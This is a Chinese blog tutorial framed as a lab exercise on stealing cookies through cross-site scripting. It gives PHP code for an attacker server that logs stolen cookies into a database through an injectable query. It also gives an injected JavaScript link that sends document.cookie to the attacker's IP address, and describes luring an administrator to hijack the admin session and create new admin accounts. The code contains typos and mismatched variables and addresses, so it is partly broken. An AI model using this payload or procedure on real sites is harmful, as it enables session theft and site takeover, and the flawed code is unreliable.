04-xss获取cookie实验

二、开发XSS服务器端

1、确认实验环境

攻击者服务器:192.168.74.134,将获取到cookie数据保存到该服务器的数据库中,运行PHP代码暴露一个接收Cookie的URL地址。

正常Web服务器:192.168.74.133,用于正常的用户访问的目标站点,用户可以在上面阅读或者发表文章。

用户浏览器:本机,Windows环境下,使用chrome浏览器

攻击者浏览器:本机,Windows环境下,使用Firefox浏览器

2、134服务器上创建一张表xssdata

3、在攻击者的服务器中建立文件xss.php

php 复制代码
<?php
    $ipadder = $_SERVER['REMOTE_ADDR'];
    $url = $_GET['url'];
    $cookie = $_GET['cookie'];
    
    $conn = new mysqli('127.0.0.1','root','root','learn') or die('数据库连接不成功.');
    $conn->set_charset('utf-8');
    $sql = "insert into xssdata(ipadder,url,cookie,createtime) values('$ipaddr','$url','$cookie',now())";
    $conn->query($sql);
    
    //echo "<script>history.back()</script>"  让浏览器倒退
    
?>

攻击者在回帖中输入文章内容,并加入JavaScript开始进行xss攻击,

当用户打开回帖会等到以下:

三、实现xss攻击

1.在页面中注入代码

php 复制代码
PHP后台需要将 + 号处理为%2B ,将&处理为  %26

<a href=\'javascript:localhost.href="http://192.168.112.183/xsssrecv.php?
url="%2Blocation.href%2B"%26cookie="%2Bocument.cookie\'><img src="http://192.168.112.83/dateme.gif"/>'"
"'></a>

2、获取Cookie后执行

在攻击者的服务器中会cookie的表

3、获取管理员 Cookie

用户向管理员举报有问题的页面,管理员前去访问,攻击者则直接获取到了管理员的cookie。

之后利用管理员的cookie直接登录到网站。但是只有几分钟的时间进行操作,期间可以查看数据库,建立用户,

也可以新建管理员,

相关推荐
treesforest9 小时前
IP地理位置精准查询:从城市级到街道级的定位技术深度解析
大数据·网络·网络协议·tcp/ip·安全·网络安全·ip
合兴软件@13 小时前
合兴软件重磅推出高性能HSM固件 国密算法赋能汽车信息安全新防线
网络·算法·网络安全·汽车·信息与通信
其实防守也摸鱼14 小时前
全新安装 SQL Server 并直接设置数据目录到 E 盘 完整步骤
数据库·sql·网络安全·sqlserver·教程·工具
探索宇宙真理.16 小时前
Geeky Bot 授权缺失导致RCE | CVE-2026-5294复现&研究
经验分享·网络安全·安全漏洞·geeky bot
Bruce_Liuxiaowei16 小时前
2026年5月第2周网络安全形势周报
人工智能·安全·网络安全·系统安全
小冷爱学习!16 小时前
Apache Shiro 1.2.4 反序列化漏洞Shiro-550(CVE-2016-4437)
服务器·网络·python·安全·网络安全·apache
世界尽头与你16 小时前
Ollama 内存泄漏漏洞(CVE-2026-7482)
安全·网络安全·渗透测试
m0_738120721 天前
应急响应(重点)——记一次某公司流量应急溯源分析(附带下载链接)
服务器·前端·数据库·安全·web安全·网络安全
聚铭网络1 天前
搞安全的谁还没点兜底绝活?——五一劳动节,致敬「网安劳动者」
网络安全
图码2 天前
一文搞懂如何判断字符串是否为Pangram(全字母句)
数据结构·算法·网络安全·数字雕刻·ping++